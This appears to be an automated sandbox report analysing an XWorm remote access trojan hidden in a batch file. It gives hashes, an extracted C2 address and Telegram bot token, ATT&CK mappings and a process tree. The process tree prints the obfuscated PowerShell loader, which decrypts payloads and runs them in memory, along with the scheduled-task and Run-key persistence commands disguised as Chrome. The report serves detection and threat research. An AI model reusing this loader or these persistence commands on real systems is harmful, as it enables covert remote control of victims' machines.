xworm | b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408

General

Target

XClient.bat
Size

64KB
MD5

b9ba38c08e5f9113c31434ae324b3a67
SHA1

c5a03303b400dcac370989ba8e51e0b0a3c0622d
SHA256

b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
SHA512

a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
SSDEEP

768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

83.143.112.35:7000

Mutex

CyKBTjaY0aAqNzKT

Attributes

Install_directory
%Temp%
install_file
Chrome.exe
telegram
https://api.telegram.org/bot6671364658:AAFSR01MD7rod9u5ExKsea5-2_kUtJR70Ks

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

15 1120 powershell.exe
26 1120 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3132 powershell.exe

flow	pid	process
15	1120	powershell.exe
26	1120	powershell.exe

pid	process
3132	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

Chrome.exe

pid process

2216 Chrome.exe

pid	process
2216	Chrome.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Chrome.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1604 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe
Runs net.exe

pid	process
1604	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exeChrome.exe

pid	process
3688	powershell.exe
3688	powershell.exe
3132	powershell.exe
3132	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
2216	Chrome.exe
2216	Chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe
Token: 36	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe
Token: 36	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1120 powershell.exe

pid	process
1120	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 2240 wrote to memory of 2368	2240	cmd.exe	net.exe
PID 2240 wrote to memory of 2368	2240	cmd.exe	net.exe
PID 2368 wrote to memory of 688	2368	net.exe	net1.exe
PID 2368 wrote to memory of 688	2368	net.exe	net1.exe
PID 2240 wrote to memory of 396	2240	cmd.exe	cmd.exe
PID 2240 wrote to memory of 396	2240	cmd.exe	cmd.exe
PID 2240 wrote to memory of 3688	2240	cmd.exe	powershell.exe
PID 2240 wrote to memory of 3688	2240	cmd.exe	powershell.exe
PID 3688 wrote to memory of 3132	3688	powershell.exe	powershell.exe
PID 3688 wrote to memory of 3132	3688	powershell.exe	powershell.exe
PID 3688 wrote to memory of 4776	3688	powershell.exe	WScript.exe
PID 3688 wrote to memory of 4776	3688	powershell.exe	WScript.exe
PID 4776 wrote to memory of 2780	4776	WScript.exe	cmd.exe
PID 4776 wrote to memory of 2780	4776	WScript.exe	cmd.exe
PID 2780 wrote to memory of 3220	2780	cmd.exe	net.exe
PID 2780 wrote to memory of 3220	2780	cmd.exe	net.exe
PID 3220 wrote to memory of 452	3220	net.exe	net1.exe
PID 3220 wrote to memory of 452	3220	net.exe	net1.exe
PID 2780 wrote to memory of 3252	2780	cmd.exe	cmd.exe
PID 2780 wrote to memory of 3252	2780	cmd.exe	cmd.exe
PID 2780 wrote to memory of 1120	2780	cmd.exe	powershell.exe
PID 2780 wrote to memory of 1120	2780	cmd.exe	powershell.exe
PID 1120 wrote to memory of 1604	1120	powershell.exe	schtasks.exe
PID 1120 wrote to memory of 1604	1120	powershell.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_36_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
5⤵
PID:3252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"
6⤵
- Creates scheduled task(s)
PID:1604

C:\Users\Admin\AppData\Local\Temp\Chrome.exe
C:\Users\Admin\AppData\Local\Temp\Chrome.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2216

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8f3393c68c469e2d1c92f7ee490b8489

SHA1
68013254b5a1d3f39d0ce88c7b7482fe7b8b9855

SHA256
3a3ac14eac25092a16f327609ab86ae52028565b1639c76f571aee5822488c23

SHA512
f71421b47408354c7b9f1ed5e6129aad398e6ecd6115ee044edea75976e015d83283ed3bbdbb3edafeac9caddfa53b551a734eb4a303014c4f95e8bdce1e67d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1lcuiiya.zuy.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat
Filesize
64KB

MD5
b9ba38c08e5f9113c31434ae324b3a67

SHA1
c5a03303b400dcac370989ba8e51e0b0a3c0622d

SHA256
b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408

SHA512
a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs
Filesize
114B

MD5
b41c44ccbb13db613bb95dd9a6ea3954

SHA1
32c826b5c1f85311494dba838f697bf50cd1943a

SHA256
3419157a7f5541e31088ce4ff48c99c3c3c4d5ffed251650ff9a723ad5ccfa9c

SHA512
9df865730a6e015e59b45750ee6ada5ae0c0636bb7d706c4bd23e56434a59553d1388a67fcbe3326668be08ba14e73f8abe6cd952c521ec3651f280ca8c36ba9

Download Submit
memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmp

Filesize
64KB

Download
memory/3688-12-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp

Filesize
10.8MB

Download
memory/3688-16-0x000001E4F2090000-0x000001E4F209E000-memory.dmp

Filesize
56KB

Download
memory/3688-15-0x000001E4F1CE0000-0x000001E4F1CE8000-memory.dmp

Filesize
32KB

Download
memory/3688-14-0x000001E4F4630000-0x000001E4F46A6000-memory.dmp

Filesize
472KB

Download
memory/3688-13-0x000001E4F45E0000-0x000001E4F4624000-memory.dmp

Filesize
272KB

Download
memory/3688-46-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp

Filesize
10.8MB

Download
memory/3688-0-0x00007FF8F5673000-0x00007FF8F5675000-memory.dmp

Filesize
8KB

Download
memory/3688-11-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmp

Filesize
10.8MB

Download
memory/3688-10-0x000001E4F2040000-0x000001E4F2062000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads